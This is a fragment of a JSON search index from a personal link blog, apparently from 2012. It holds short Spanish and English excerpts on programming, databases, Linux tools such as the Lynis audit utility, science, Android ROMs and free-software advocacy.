rodean.\n» revolucioncientifica.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/15/existen-los-colores-en-la-naturaleza/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAparentemente esta pregunta parece absurda, ¿Como no van a existir los\nbellos colores de los paisajes que podemos observar a diario? El azul\ndel cielo, el verde de las hojas de los árboles\u0026hellip; parece evidente que\nlos colores existen y son uno de los atributos más fundamentales de\ntodos los objetos que observamos. Sin embargo, como veremos a\ncontinuación la respuesta a esta pregunta es asombrosa e inesperada.\nLo primero que tenemos que hacer para tratar de responderla es\nanalizar brevemente como y por que vemos los objetos que nos rodean.\u003c/p\u003e","title":"¿Existen los colores en la naturaleza?"},{"content":" Even in times of a growing market of specialized NoSQL databases, the relevance of traditional RDBMS doesn’t decline. Especially when it comes to the calculation of aggregates based on complex data sets that can not be processed as a batch like Map\u0026amp;Reduce. MySQL is already bringing in a handful of aggregate functions that can be useful for a statistical analysis. The best known of this type are certainly:\nCOUNT(x), SUM(x), AVG(x), MIN(x), MAX(x), STD(x) In addition, there are a number of statistical evaluations which are also worthwhile - if not even more interesting and meaningful, but with MySQL only producible with greater efforts. What about the different averages? The harmonic average, a weighted average or the geomean? What is in the course of this with the aggregate product? How do we determine the mode, the median? The covariance?\nIn the following article I want to go to the bottom of these questions and develop a list of standard formulas for a statistical evaluation. Presumably the article is meant more for beginners. In addition, a few new features have been poured into my infusion UDF, which simplifies some of the calculations. You can check out the source of the UDF on Github:\n» Robert Eisele | xarg.org\n","permalink":"http://karpoke.ignaciocano.com/2012/07/14/statistical-functions-in-mysql/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEven in times of a growing market of specialized NoSQL databases, the\nrelevance of traditional RDBMS doesn’t decline. Especially when it\ncomes to the calculation of aggregates based on complex data sets that\ncan not be processed as a batch like Map\u0026amp;Reduce. MySQL is already\nbringing in a handful of aggregate functions that can be useful for a\nstatistical analysis. The best known of this type are certainly:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003eCOUNT(x), SUM(x), AVG(x), MIN(x), MAX(x), STD(x)\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eIn addition, there are a number of statistical evaluations which are\nalso worthwhile - if not even more interesting and meaningful, but\nwith MySQL only producible with greater efforts. What about the\ndifferent averages? The harmonic average, a weighted average or the\ngeomean? What is in the course of this with the aggregate product? How\ndo we determine the mode, the median? The covariance?\u003c/p\u003e","title":"Statistical functions in MySQL"},{"content":" We provide pre-built images for several open-source operating systems.\nPlease note that:\nEvery image contains the latest software as of the day the image was built. Performing updates is on your own, and may require looking for documentation to read using your favourite search engine. Default usernames and passwords, where required, can be found next to the download link of each image. You are warmly invited to create your own user, or at least to change passwords, if you intend to use the images in a public environment.\n» virtualboxes.org\n","permalink":"http://karpoke.ignaciocano.com/2012/07/14/ready-to-use-virtual-machines-sporting-open-source-operating-systems/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWe provide pre-built images for several open-source operating systems.\u003c/p\u003e\n\u003cp\u003ePlease note that:\u003c/p\u003e\n\u003cp\u003eEvery image contains the latest software as of the day the image was\nbuilt. Performing updates is on your own, and may require looking for\ndocumentation to read using your favourite search engine.\nDefault usernames and passwords, where required, can be found next to\nthe download link of each image. You are warmly invited to create your\nown user, or at least to change passwords, if you intend to use the\nimages in a public environment.\u003c/p\u003e","title":"Ready-to-use virtual machines sporting open-source operating systems"},{"content":"Lynis es una herramienta para realizar auditorías en sistemas Unix. Escanea el sistema en busca de vulnerabilidades y fallos de seguridad. También muestra información general del sistema, paquetes instalados y errores de configuración.\nSu objetivo es ayudar en el proceso de auditoría, actualización del software y escaneo de vulnerabilidades y malware en sistemas Unix. Se puede ejecutar sin necesidad de instalación.\nSe puede utilizar en auditorías Basel II, GLBA, HIPAA, PCI DSS y SOX (Sabarnes-Oxley). La documentación está disponible en línea.\nSi queremos probarlo, no tenemos más que descargarlo de su página, ahora mismo la última versión estable es la 1.3.0, descomprimirlo y ejecutarlo:\n$ wget http://www.rootkit.nl/files/lynis-1.3.0.tar.gz $ shasum lynis-1.3.0.tar.gz b60921420277a969cf862b0e0166fe36451057b9 lynis-1.3.0.tar.gz $ tar xvzf lynis-1.3.0.tar.gz $ cd lynis-1.3.0 Algunas opciones:\nScan options: --auditor \u0026#34;\u0026#34; : Auditor name --check-all (-c) : Check system --no-log : Don’t create a log file --profile : Scan the system with the given profile file --quick (-Q) : Quick mode, don’t wait for user input --tests \u0026#34;\u0026#34; : Run only tests defined by --tests-category \u0026#34;\u0026#34; : Run only tests defined by Layout options: --no-colors : Don’t use colors in output --quiet (-q) : No output, except warnings --reverse-colors : Optimize color display for light backgrounds Misc options: --check-update : Check for updates --view-manpage (--man) : View man page --version (-V) : Display version number and quit Por ejemplo:\n$ sudo ./lynis -Q Si queremos que realice un reporte automático, por ejemplo diario, podemos incluir una línea como la siguiente en el cron:\n$ sudo crontab -e 23 7 * * * /path/to/lynis-1.3.0/lynis --auditor \u0026#34;automated\u0026#34; --cronjob El argumento --cronjob equivale a -c -Q, es decir, todos los tests y sin intervención del usuario.\nO crear el fichero /etc/cron.daily/lynis con el siguiente contenido:\n#!/bin/sh LYNIS=/path/to/lynis-1.3.0/lynis NICE=0 MAILTO=\u0026#34;root@localhost\u0026#34; test -x $LYNIS || exit 0 OUTFILE=`mktemp` || exit 1 cd $(dirname $LYNIS) /usr/bin/nice -n $NICE $LYNIS --cronjob --auditor \u0026#34;automated\u0026#34; \u0026gt; $OUTFILE if [ -s \u0026#34;$OUTFILE\u0026#34; ]; then SUBJECT=\u0026#34;Subject: [lynis] $(hostname -f) - Daily report\u0026#34; cat $OUTFILE | mail -s $SUBJECT $MAILTO fi rm -f $OUTFILE Actualizado el 3 de diciembre de 2016 La forma más sencilla de mantener lynis actualizado es utilizar el repositorio oficial y seguir lo siguientes pasos.\nSi lo habíamos instalado desde los repositorios de Ubuntu, lo desinstalamos:\n$ sudo apt remove lynis Descargamos la clave desde el servidor central de claves de Ubuntu:\n$ sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys C80E383C3DE9F082E01391A0366C67DE91CA5D5F En su defecto, también podríamos descargarla e importarla del servidor oficial de la aplicación:\n$ wget -O - http://packages.cisofy.com/keys/cisofy-software-public.key | sudo apt-key add - Añadimos el repostorio:\n$ echo \u0026#34;deb https://packages.cisofy.com/community/lynis/deb/ trusty main\u0026#34; | sudo tee -a /etc/apt/sources.list.d/cisofy-lynis.list Actualizamos los paquetes y reinstalamos:\n$ sudo apt update $ sudo apt install lynis ","permalink":"http://karpoke.ignaciocano.com/2012/07/14/lynis-para-auditorias-de-seguridad/","summary":"\u003cp\u003e\u003ca href=\"http://www.rootkit.nl/projects/lynis.html\"\u003eLynis\u003c/a\u003e es una herramienta para realizar auditorías en sistemas Unix.\nEscanea el sistema en busca de vulnerabilidades y fallos de seguridad.\nTambién muestra información general del sistema, paquetes instalados y\nerrores de configuración.\u003c/p\u003e\n\u003cp\u003eSu objetivo es ayudar en el proceso de auditoría, actualización del\nsoftware y escaneo de vulnerabilidades y \u003cem\u003emalware\u003c/em\u003e en sistemas Unix. Se\npuede ejecutar sin necesidad de instalación.\u003c/p\u003e\n\u003cp\u003eSe puede utilizar en auditorías Basel II, GLBA, HIPAA, PCI DSS y SOX\n(Sabarnes-Oxley). La \u003ca href=\"http://www.rootkit.nl/files/lynis-documentation.html\"\u003edocumentación\u003c/a\u003e está disponible en línea.\u003c/p\u003e","title":"Lynis para auditorías de seguridad"},{"content":" Pere Roura (Universitat de Girona) y Daniel Oliu nos cuentan en ”How energy efficient is your car?,” AJP 80: 588-593, July 2012, cómo medir de forma práctica la eficiencia energética de tu propio coche. Como ejemplo utilizan su Volkswagen Lupo 3L, un coche diseñado para ser muy eficiente con un motor diésel de tres cilindros, un peso de 830 kg y un consumo récord de solo 3 litros a los 100 km. Según su estudio solo el 28% de la energía del combustible se transfiere a las ruedas, lo que sin lugar a dudas es todo un récord en eficiencia para un vehículo comercial. Sin embargo, también nos recuerda que el 72% de la energía del combustible se pierde por aerodinámica, fricción, pérdidas mecánicas y térmicas. En los vehículos de gasolina, la eficiencia suele ser mucho menor. Para un vehículo típico se estima que solo el 12-13% de la energía del combustible se transmite a las ruedas, según el estudio de Joseph A. Carpenter, Jr. (Department of Energy, USA) et al., ”Road Transportation Vehicles,” MRS Bull. 33: 439–444, 2008 [copia gratis], del que he extraído la figura de abajo.\nRoura y Oliu nos proponen experimentos sencillos que los estudiantes de grado en ingeniería industrial, mecánica y otras titulaciones similares pueden ejecutar solo con conocimiento básicos de mecánica (resistencia del aire y a la rodadura) y termodinámica (ciclos térmicos). No traduciré todo su artículo, solo presentaré un breve resumen con las figuras clave, para que veáis cómo se realizan los experimentos y cómo se obtienen los resultados. Animo a los interesados en más detalles que consulten el artículo en la revista (American Journal of Physics), si tienen acceso, o que le pidan por correo electrónico una copia a Pepe Roura (que seguro que estará encantado por el interés despertado por su artículo).\n» francisthemulenews.wordpress.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/14/como-medir-la-eficiencia-energetica-de-tu-propio-coche/","summary":"\u003cblockquote\u003e\n\u003cp\u003ePere Roura (Universitat de Girona) y Daniel Oliu nos cuentan en ”How\nenergy efficient is your car?,” AJP 80: 588-593, July 2012, cómo medir\nde forma práctica la eficiencia energética de tu propio coche. Como\nejemplo utilizan su Volkswagen Lupo 3L, un coche diseñado para ser muy\neficiente con un motor diésel de tres cilindros, un peso de 830 kg y\nun consumo récord de solo 3 litros a los 100 km. Según su estudio solo\nel 28% de la energía del combustible se transfiere a las ruedas, lo\nque sin lugar a dudas es todo un récord en eficiencia para un vehículo\ncomercial. Sin embargo, también nos recuerda que el 72% de la energía\ndel combustible se pierde por aerodinámica, fricción, pérdidas\nmecánicas y térmicas. En los vehículos de gasolina, la eficiencia\nsuele ser mucho menor. Para un vehículo típico se estima que solo el\n12-13% de la energía del combustible se transmite a las ruedas, según\nel estudio de Joseph A. Carpenter, Jr. (Department of Energy, USA) et\nal., ”Road Transportation Vehicles,” MRS Bull. 33: 439–444, 2008\n[copia gratis], del que he extraído la figura de abajo.\u003c/p\u003e","title":"Cómo medir la eficiencia energética de tu propio coche"},{"content":" Arthur W. Burks / Herman H. Goldstine / John von Neumann\nPART I\n​1. Principal components of the machine\n1.1. Inasmuch as the completed device will be a general-purpose computing machine it should contain certain main organs relating to arithmetic, memory-storage, control and connection with the human operator. It is intended that the machine be fully automatic in character, i.e. independent of the human operator after the computation starts. A fuller discussion of the implications of this remark will be given in Sec. 3 below.\n1.2. It is evident that the machine must be capable of storing in some manner not only the digital information needed in a given computation such as boundary values, tables of functions (such as the equation of state of a fluid) and also the intermediate results of the computation (which may be wanted for varying lengths of time), but also the instructions which govern the actual routine to be performed on the numerical data. In a special-purpose machine these instructions are an integral part of the device and constitute a part of its design structure. For an all-purpose machine it must be possible to instruct the device to carry out any computation that can be formulated in numerical terms. Hence there must be some organ capable of storing these program orders. There must, moreover, be a unit which can understand these instructions and order their execution.\n» cs.unc.edu/~adyilie\n","permalink":"http://karpoke.ignaciocano.com/2012/07/13/preliminary-discussion-of-the-logical-design-of-an-electronic-computing-instrument/","summary":"\u003cblockquote\u003e\n\u003cp\u003eArthur W. Burks / Herman H. Goldstine / John von Neumann\u003c/p\u003e\n\u003cp\u003ePART I\u003c/p\u003e\n\u003cp\u003e​1. Principal components of the machine\u003c/p\u003e\n\u003cp\u003e1.1. Inasmuch as the completed device will be a general-purpose\ncomputing machine it should contain certain main organs relating to\narithmetic, memory-storage, control and connection with the human\noperator. It is intended that the machine be fully automatic in\ncharacter, i.e. independent of the human operator after the\ncomputation starts. A fuller discussion of the implications of this\nremark will be given in Sec. 3 below.\u003c/p\u003e","title":"Preliminary discussion of the logical design of an electronic computing instrument"},{"content":" I was in charge of scaling Dropbox for a while, from roughly 4,000 to 40,000,000 users. For most of that time we had one to three people working on the backend. Here are some suggestions on scaling, particularly in a resource-constrained, fast-growing environment that can’t always afford to do things ”the right way” (i.e., any real-world engineering project ;-). If people find this useful, I’ll try to come up with more tips and write a part 2.\n» Rajiv Eranki | eranki.tumblr.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/13/scaling-lessons-learned-at-dropbox/","summary":"\u003cblockquote\u003e\n\u003cp\u003eI was in charge of scaling Dropbox for a while, from roughly 4,000 to\n40,000,000 users. For most of that time we had one to three people\nworking on the backend. Here are some suggestions on scaling,\nparticularly in a resource-constrained, fast-growing environment that\ncan’t always afford to do things ”the right way” (i.e., any real-world\nengineering project ;-). If people find this useful, I’ll try to come\nup with more tips and write a part 2.\u003c/p\u003e","title":"Scaling lessons learned at Dropbox"},{"content":" This thread has 2 Posts, and is categorized as following. You can scroll down to the Point you are looking for.\nPost 1:\nGetting Root / S-OFF to your Wildfire. A Short overview and Guide Custom ROM List\nPost 2:\nCustom Kernels List Radio (Baseband) List RUU List (ROM Update Utility - Getting back to stock) Custom Recoveries (ClockWorkMod) Themes List Misc tweaks / hacks\n» 3xeno | xda-developers.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/13/the-complete-wildfire-index-roots-off-guidesromskernelsradiosruurecoveriesthemes/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis thread has 2 Posts, and is categorized as following. You can\nscroll down to the Point you are looking for.\u003c/p\u003e\n\u003cp\u003ePost 1:\u003c/p\u003e\n\u003cp\u003eGetting Root / S-OFF to your Wildfire. A Short overview and Guide\nCustom ROM List\u003c/p\u003e\n\u003cp\u003ePost 2:\u003c/p\u003e\n\u003cp\u003eCustom Kernels List\nRadio (Baseband) List\nRUU List (ROM Update Utility - Getting back to stock)\nCustom Recoveries (ClockWorkMod)\nThemes List\nMisc tweaks / hacks\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» 3xeno | \u003ca href=\"http://forum.xda-developers.com/showthread.php?t=1029318\"\u003exda-developers.com\u003c/a\u003e\u003c/p\u003e","title":"The Complete Wildfire Index (Root/S-OFF Guides/ROMs/Kernels/Radios/RUU/Recoveries/Themes)"},{"content":"[ROM] [UPDATE1] [{^NaRkDrOiD IcX3^}][4.0.3. LP8/LP9][MejorasVarias][Mods][Extras][Novedades y mucho más!] [ ¿¿TE LO VAS A PERDER?? ]\n» anarko919 | htcmania.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/13/rom-narkdroid-icx3-4-0-3-lp8lp9-para-samsung-galaxy-s2/","summary":"\u003cp\u003e[ROM] [UPDATE1] [{^NaRkDrOiD IcX3^}][4.0.3.\nLP8/LP9][MejorasVarias][Mods][Extras][Novedades y mucho más!] [ ¿¿TE LO\nVAS A PERDER?? ]\u003c/p\u003e\n\u003cdiv style=\"position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;\"\u003e\n      \u003ciframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen\" loading=\"eager\" referrerpolicy=\"strict-origin-when-cross-origin\" src=\"https://www.youtube.com/embed/R0Gnec5UpGs?autoplay=0\u0026amp;controls=1\u0026amp;end=0\u0026amp;loop=0\u0026amp;mute=0\u0026amp;start=0\" style=\"position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;\" title=\"YouTube video\"\u003e\u003c/iframe\u003e\n    \u003c/div\u003e\n\n\u003cp\u003e» anarko919 | \u003ca href=\"http://www.htcmania.com/showthread.php?t=332730\"\u003ehtcmania.com\u003c/a\u003e\u003c/p\u003e","title":"ROM NaRkDrOiD IcX3 (4.0.3 LP8/LP9) para Samsung Galaxy S2"},{"content":" The thing to remember, above all else when writing JS code, is that it’s a dynamic language. This means there are a lot of ways to do things. You don’t have to deal with strongly typed classes, or some of the more complex features from languages, like C# and Java. This is both a blessing and a curse.\nYou can read an article on the history of JavaScript here, but the gist of it is that Brandon Eich, in 1995, was hired by Netscape to design a language. What he came up with was the loosely typed language that we know as JavaScript. Over the years, it became ”standardized” as ECMAscript, but, throughout all the browser wars, the various browsers implemented these features differently. This, naturally, lead to a lot of sleepless nights for web developers. This problem, when combined with the fact that JavaScript was considered to be most applicable for manipulating images and performing quick bits of validation, led JavaScript to, incorrectly, be viewed as a terrible language.\n» Jonathan Creamer | net.tutsplus.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/11/key-principles-of-maintainable-javascript/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe thing to remember, above all else when writing JS code, is that\nit’s a dynamic language. This means there are a lot of ways to do\nthings. You don’t have to deal with strongly typed classes, or some of\nthe more complex features from languages, like C# and Java. This is\nboth a blessing and a curse.\u003c/p\u003e\n\u003cp\u003eYou can read an article on the history of JavaScript here, but the\ngist of it is that Brandon Eich, in 1995, was hired by Netscape to\ndesign a language. What he came up with was the loosely typed language\nthat we know as JavaScript. Over the years, it became ”standardized”\nas ECMAscript, but, throughout all the browser wars, the various\nbrowsers implemented these features differently. This, naturally, lead\nto a lot of sleepless nights for web developers. This problem, when\ncombined with the fact that JavaScript was considered to be most\napplicable for manipulating images and performing quick bits of\nvalidation, led JavaScript to, incorrectly, be viewed as a terrible\nlanguage.\u003c/p\u003e","title":"Key Principles of Maintainable JavaScript"},{"content":" We built Twemcache because we needed a more robust and manageable version of Memcached, suitable for our large-scale production environment. Today, we are open-sourcing Twemcache under the New BSD license. As one of the largest adopters of Memcached, a popular open source caching system, we have used Memcached over the years to help us scale our ever-growing traffic. Today, we have hundreds of dedicated cache servers keeping over 20TB of data from over 30 services in-memory, including crucial data such as user information and Tweets. Collectively these servers handle almost 2 trillion queries on any given day (that’s more than 23 million queries per second). As we continued to grow, we needed a more robust and manageable version of Memcached suitable for our large scale production environment.\nWe have been running Twemcache in production for more than a year and a half. Twemcache is based on a fork of Memcached v1.4.4 that is heavily modified to improve maintainability and help us monitor our cache servers better. We improved performance, removed code that we didn’t find necessary, refactored large source files and added observability related features. The following sections will provide more details on why we did this and what those new features are.\n» Chris Aniszczyk | engineering.twitter.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/11/caching-with-twemcache/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWe built Twemcache because we needed a more robust and manageable\nversion of Memcached, suitable for our large-scale production\nenvironment. Today, we are open-sourcing Twemcache under the New BSD\nlicense. As one of the largest adopters of Memcached, a popular open\nsource caching system, we have used Memcached over the years to help\nus scale our ever-growing traffic. Today, we have hundreds of\ndedicated cache servers keeping over 20TB of data from over 30\nservices in-memory, including crucial data such as user information\nand Tweets. Collectively these servers handle almost 2 trillion\nqueries on any given day (that’s more than 23 million queries per\nsecond). As we continued to grow, we needed a more robust and\nmanageable version of Memcached suitable for our large scale\nproduction environment.\u003c/p\u003e","title":"Caching with Twemcache"},{"content":" The TTY subsystem is central to the design of Linux, and UNIX in general. Unfortunately, its importance is often overlooked, and it is difficult to find good introductory articles about it. I believe that a basic understanding of TTYs in Linux is essential for the developer and the advanced user.\nBeware, though: What you are about to see is not particularly elegant. In fact, the TTY subsystem ” while quite functional from a user’s point of view ” is a twisty little mess of special cases. To understand how this came to be, we have to go back in time.\n» Linus …kesson | linusakesson.net\n","permalink":"http://karpoke.ignaciocano.com/2012/07/09/the-tty-demystified/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe TTY subsystem is central to the design of Linux, and UNIX in\ngeneral. Unfortunately, its importance is often overlooked, and it is\ndifficult to find good introductory articles about it. I believe that\na basic understanding of TTYs in Linux is essential for the developer\nand the advanced user.\u003c/p\u003e\n\u003cp\u003eBeware, though: What you are about to see is not particularly elegant.\nIn fact, the TTY subsystem ” while quite functional from a user’s\npoint of view ” is a twisty little mess of special cases. To\nunderstand how this came to be, we have to go back in time.\u003c/p\u003e","title":"The TTY demystified"},{"content":" Random number generation is subtle. Random number generators contain deterministic algorithms designed to produce output that simulates non-deterministic behavior. It’s amazing that there are algorithms that do this well enough for many applications. But unless used carefully, random number generators can misbehave in mysterious ways.\n» John D. Cook | codeproject.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/09/pitfalls-in-random-number-generation/","summary":"\u003cblockquote\u003e\n\u003cp\u003eRandom number generation is subtle. Random number generators contain\ndeterministic algorithms designed to produce output that simulates\nnon-deterministic behavior. It’s amazing that there are algorithms that do\nthis well enough for many applications. But unless used carefully, random\nnumber generators can misbehave in mysterious ways.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» John D. Cook | \u003ca href=\"http://www.codeproject.com/Articles/28548/Pitfalls-in-Random-Number-Generation\"\u003ecodeproject.com\u003c/a\u003e\u003c/p\u003e","title":"Pitfalls in Random Number Generation"},{"content":" Bajo la intensa mirada del telescopio espacial Kepler, van apareciendo ante nosotros más y más planetas similares al nuestro. Todavía no hemos encontrado uno exactamente igual que la Tierra, pero son tantos los descubiertos que parece que la galaxia debe estar llena de planetas habitables.\nEstos descubrimientos nos traen de nuevo una vieja paradoja. Tal como el físico Enrico Fermi, preguntó en 1950, si hay muchas sitios adecuados para la vida ahí fuera y las formas de vida extraterrestre pueden ser comunes, ¿dónde se han metido? Después de más de medio siglo de búsqueda de inteligencia extraterrestre, hasta el momento nos quedamos con las manos vacías.\nPor supuesto, el universo es un lugar muy grande. Incluso la famosa y optimista ”ecuación” de Frank Drake sobre la probabilidad de vida sugiere que, si tenemos suerte, nos toparemos con alienígenas inteligentes: ellos pueden estar ahí fuera, pero eso nunca lo sabremos. No obstante, esa respuesta no satisface a nadie.\n» Pedro Donaire | bitnavegante.blogspot.com.es\n","permalink":"http://karpoke.ignaciocano.com/2012/07/07/la-vida-es-inevitable-o-un-simple-acontecimiento-fortuito/","summary":"\u003cblockquote\u003e\n\u003cp\u003eBajo la intensa mirada del telescopio espacial Kepler, van apareciendo\nante nosotros más y más planetas similares al nuestro. Todavía no\nhemos encontrado uno exactamente igual que la Tierra, pero son tantos\nlos descubiertos que parece que la galaxia debe estar llena de\nplanetas habitables.\u003c/p\u003e\n\u003cp\u003eEstos descubrimientos nos traen de nuevo una vieja paradoja. Tal como\nel físico Enrico Fermi, preguntó en 1950, si hay muchas sitios\nadecuados para la vida ahí fuera y las formas de vida extraterrestre\npueden ser comunes, ¿dónde se han metido? Después de más de medio\nsiglo de búsqueda de inteligencia extraterrestre, hasta el momento nos\nquedamos con las manos vacías.\u003c/p\u003e","title":"La vida, ¿es inevitable o un simple acontecimiento fortuito?"},{"content":" There was a recent question about a PHP security checklist on a forum I frequent, and I’ve decided to write my own comprehensive checklist to fill the void. There’s something for everyone but the security expert. In fact, you might find an issue that you never thought about. Securing PHP web applications would be a better title for this article.\n» sk89q.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/06/definitive-php-security-checklist/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThere was a recent question about a PHP security checklist on a forum\nI frequent, and I’ve decided to write my own comprehensive checklist\nto fill the void. There’s something for everyone but the security\nexpert. In fact, you might find an issue that you never thought about.\nSecuring PHP web applications would be a better title for this\narticle.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"http://www.sk89q.com/2009/08/definitive-php-security-checklist/\"\u003esk89q.com\u003c/a\u003e\u003c/p\u003e","title":"Definitive PHP security checklist"},{"content":" We have been working hard the last several months to stop Restricted Boot, a major threat to user freedom, free software ideals, and free software adoption. Under the guise of security, a computer afflicted with Restricted Boot refuses to boot any operating systems other than the ones the computer distributor has approved in advance. Restricted Boot takes control of the computer away from the user and puts it in the hands of someone else.\nTo respect user freedom and truly protect user security, computer makers must either provide users a way of disabling such boot restrictions, or provide a sure-fire way that allows the computer user to install a free software operating system of her choice.\nDistributors of restricted systems usually appeal to security concerns. They claim that if unapproved software can be used on the machines they sell, malware will run amok. By only allowing software they approve to run, they can protect us.\nThis claim ignores the fact that we need protection from them. We don’t want a machine that only runs software approved by them \u0026ndash; our computers should always run only software approved by us. We may choose to trust someone else to help us make those approval decisions, but we should never be locked into that relationship by force of technological restriction or law. Software that enforces such restrictions is malware. Companies like Microsoft that push these restrictions also have a terrible track record when it comes to security, which makes their platitudes about restricting us for our own good both hollow and deceitful.\n» fsf.org\n","permalink":"http://karpoke.ignaciocano.com/2012/07/06/free-software-foundation-recommendations-for-free-operating-system-distributions-considering-secure-boot/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWe have been working hard the last several months to stop Restricted\nBoot, a major threat to user freedom, free software ideals, and free\nsoftware adoption. Under the guise of security, a computer afflicted\nwith Restricted Boot refuses to boot any operating systems other than\nthe ones the computer distributor has approved in advance. Restricted\nBoot takes control of the computer away from the user and puts it in\nthe hands of someone else.\u003c/p\u003e","title":"Free Software Foundation recommendations for free operating system distributions considering Secure Boot"},{"content":" We believe that a free and open Internet can bring about a better world. To keep the Internet free and open, we call on communities, industries and countries to recognize these principles. We believe that they will help to bring about more creativity, more innovation and more open societies.\nWe are joining an international movement to defend our freedoms because we believe that they are worth fighting for.\nLet’s discuss these principles ” agree or disagree with them, debate them, translate them, make them your own and broaden the discussion with your community ” as only the Internet can make possible.\nJoin us in keeping the Internet free and open.\n[You can interact with the following text on reddit, Techdirt, Cheezburger, Github and Rhizome.]\nDeclaration\nWe stand for a free and open Internet.\nWe support transparent and participatory processes for making Internet policy and the establishment of five basic principles:\nExpression: Don’t censor the Internet.\nAccess: Promote universal access to fast and affordable networks.\nOpenness: Keep the Internet an open network where everyone is free to connect, communicate, write, read, watch, speak, listen, learn, create and innovate.\nInnovation: Protect the freedom to innovate and create without permission. Don’t block new technologies, and don’t punish innovators for their users’ actions.\nPrivacy: Protect privacy and defend everyone’s ability to control how their data and devices are used.\n» internetdeclaration.org\n","permalink":"http://karpoke.ignaciocano.com/2012/07/05/declaration-of-internet-freedom/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWe believe that a free and open Internet can bring about a better\nworld. To keep the Internet free and open, we call on communities,\nindustries and countries to recognize these principles. We believe\nthat they will help to bring about more creativity, more innovation\nand more open societies.\u003c/p\u003e\n\u003cp\u003eWe are joining an international movement to defend our freedoms\nbecause we believe that they are worth fighting for.\u003c/p\u003e\n\u003cp\u003eLet’s discuss these principles ” agree or disagree with them, debate\nthem, translate them, make them your own and broaden the discussion\nwith your community ” as only the Internet can make possible.\u003c/p\u003e","title":"Declaration of Internet freedom"},{"content":" In every decent programmer’s toolbox lies a strange weapon called a Radix Sort. Where does it come from ? Who invented it ? I don’t know. As far as I can remember it was there, fast, easy, effective. Really effective. So unbelievably useful I’ve never really understood why people would want to use something else. The reasons ? Most of the time, they tell me about floats, negative values, and why their new quick-sort code rocks.\nEnough, I’m tired. Although the standard Radix Sort doesn’t work very well with floating point values, this is something actually very easy to fix. In this little article I will review the standard Radix Sort algorithm, and enhance it so that :\nit sorts negative floats as well it has reduced complexity for bytes and words it uses temporal coherence it supports sorting on multiple keys » Pierre Terdiman | codercorner.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/05/radix-sort-revisited/","summary":"\u003cblockquote\u003e\n\u003cp\u003eIn every decent programmer’s toolbox lies a strange weapon called a\nRadix Sort. Where does it come from ? Who invented it ? I don’t know.\nAs far as I can remember it was there, fast, easy, effective. Really\neffective. So unbelievably useful I’ve never really understood why\npeople would want to use something else. The reasons ? Most of the\ntime, they tell me about floats, negative values, and why their new\nquick-sort code rocks.\u003c/p\u003e","title":"Radix Sort Revisited"},{"content":" A lot of programmers that make some of the coolest and most useful software today, such as many of the stuff we see on the Internet or use daily, don’t have a theoretical computer science background. They’re still pretty awesome and creative programmers and we thank them for what they build.\nHowever, theoretical computer science has its uses and applications and can turn out to be quite practical. In this article, targeted at programmers who know their art but who don’t have any theoretical computer science background, I will present one of the most pragmatic tools of computer science: Big O notation and algorithm complexity analysis. As someone who has worked both in a computer science academic setting and in building production-level software in the industry, this is the tool I have found to be one of the truly useful ones in practice, so I hope after reading this article you can apply it in your own code to make it better. After reading this post, you should be able to understand all the common terms computer scientists use such as ”big O”, ”asymptotic behavior” and ”worst-case analysis”.\n» Dionysis \u0026ldquo;dionyziz\u0026rdquo; Zindros | discrete.gr\n","permalink":"http://karpoke.ignaciocano.com/2012/07/05/a-gentle-introduction-to-algorithm-complexity-analysis/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA lot of programmers that make some of the coolest and most useful\nsoftware today, such as many of the stuff we see on the Internet or\nuse daily, don’t have a theoretical computer science background.\nThey’re still pretty awesome and creative programmers and we thank\nthem for what they build.\u003c/p\u003e\n\u003cp\u003eHowever, theoretical computer science has its uses and applications\nand can turn out to be quite practical. In this article, targeted at\nprogrammers who know their art but who don’t have any theoretical\ncomputer science background, I will present one of the most pragmatic\ntools of computer science: Big O notation and algorithm complexity\nanalysis. As someone who has worked both in a computer science\nacademic setting and in building production-level software in the\nindustry, this is the tool I have found to be one of the truly useful\nones in practice, so I hope after reading this article you can apply\nit in your own code to make it better. After reading this post, you\nshould be able to understand all the common terms computer scientists\nuse such as ”big O”, ”asymptotic behavior” and ”worst-case analysis”.\u003c/p\u003e","title":"A Gentle Introduction to Algorithm Complexity Analysis"},{"content":" SKIP THE LICENSE Reading software licenses sucks, so we’ve summarized all of the popular ones for you in a neat at-a-glance format. Just begin typing the name of your license on the frontpage and select from the auto-completing drop-down menu. TL;DR - We summarize software licenses.\nLET THEM TAKE IT EASY Do you have people using your software? We all hate reading software licenses. Let them take it easy and link them to your license on here. We provide embed and linking options for every license on the site. Next time include a link alongside your license. TL;DR - Link a summary in place of a license.\n» tldrlegal.com\n","permalink":"http://karpoke.ignaciocano.com/2012/07/04/tldrlegal/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSKIP THE LICENSE\nReading software licenses sucks, so we’ve summarized all of the\npopular ones for you in a neat at-a-glance format. Just begin typing\nthe name of your license on the frontpage and select from the\nauto-completing drop-down menu.\nTL;DR - We summarize software 